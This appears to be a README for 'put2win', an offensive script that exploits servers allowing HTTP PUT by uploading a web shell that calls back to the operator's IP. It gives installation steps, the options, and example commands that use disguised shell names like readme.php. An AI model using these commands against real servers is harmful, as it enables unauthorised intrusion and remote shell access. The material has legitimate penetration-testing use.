
Script pour automatiser l'exploitation de la méthode HTTP PUT afin d'obtenir un shell
Script pour automatiser l'exploitation de la méthode HTTP PUT afin d'obtenir un shell.
git clone https://github.com/sysdevploit/put2win
cd put2win
chmod +x put2win.sh
Script to automate PUT HTTP method exploitation to get shell.
Options:
-t CIBLE URL/IP cible (ex. 192.168.1.10)
-p PORT Port cible (ex. 8080)
-u CHEMIN_URL Chemin pour enregistrer le shell (ex. /uploads)
-l IP LOCALE IP à laquelle le shell se connectera (ex. 192.168.1.5)
-s NOM SHELL Nom du shell (ex. license.php)
Exemples d'utilisation :
- bash put2win.sh -t 192.168.1.80 -l 192.168.1.10 -s readme.php
- bash put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10
Telegram: @devploit
Twitter: @devploit